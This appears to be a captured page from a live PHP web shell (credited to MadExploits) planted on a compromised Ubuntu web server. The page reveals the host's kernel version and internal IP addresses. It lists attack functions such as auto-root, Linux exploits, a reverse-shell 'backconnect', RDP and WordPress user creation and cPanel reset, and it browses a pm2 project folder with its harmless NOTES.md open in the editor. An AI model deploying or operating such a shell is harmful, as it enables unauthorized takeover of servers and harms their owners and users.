Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
@pm2 /
io /
[ HOME SHELL ]
Name
Size
Permission
Action
.vscode
[ DIR ]
drwxrwxr-x
build
[ DIR ]
drwxrwxr-x
docs
[ DIR ]
drwxrwxr-x
node_modules
[ DIR ]
drwxrwxr-x
pres
[ DIR ]
drwxrwxr-x
.drone.jsonnet
2.29
KB
-rw-rw-r--
.mocharc.js
280
B
-rw-rw-r--
CHANGELOG.md
259
B
-rw-rw-r--
LICENSE.md
11.08
KB
-rw-rw-r--
NOTES.md
1.62
KB
-rw-rw-r--
README.md
16.43
KB
-rw-rw-r--
docker-compose.yml
477
B
-rw-rw-r--
package.json
2.36
KB
-rw-rw-r--
test.sh
1.92
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : NOTES.md
## API idea require('pm2-bundle-monitoring') // or require('pm2-io').connect({ secret: '', public: '' }) require('pm2-exception-catching') require('pm2-transaction-tracing').config({ ignore_route: '/ws' }) require('pm2-frontend-monitoring') var pm2_metrics = require('pm2-metrics') pm2_metrics.variable('BLE pairing mode', permit_join) pm2_metrics.variable('In memory users', () => Object.keys(users).length) NOTES: - watch parameters is not reset on pm2 restart. only after pm2 delete ---- pm2-io-apm features are in src/features/: ``` src/features/ ├── dependencies.ts ├── entrypoint.ts ├── events.ts ├── metrics.ts ├── notify.ts ├── profiling.ts └── tracing.ts ``` ## Tracing - `./src/census` folder is essentially a dump of https://github.com/census-instrumentation/opencensus-node/tree/master/packages/opencensus-nodejs-base/src/trace with plugins added - Only traces higher than `MINIMUM_TRACE_DURATION: 1000 * 1000` are sent to transporter (sent in /src/census/exporter.ts:72) Trace sent looks like: ``` { traceId: 'fac7052e9129416185a26d4935229620', name: '/slow', id: '66358f0a48be82c5', parentId: '', kind: 'SERVER', timestamp: 1586380086251000, duration: 2007559, debug: false, shared: false, localEndpoint: { serviceName: 'tototransaction' }, tags: { 'http.host': 'localhost', 'http.method': 'GET', 'http.path': '/slow', 'http.route': '/slow', 'http.user_agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36', 'http.status_code': '304', 'result.code': undefined } } ```
Close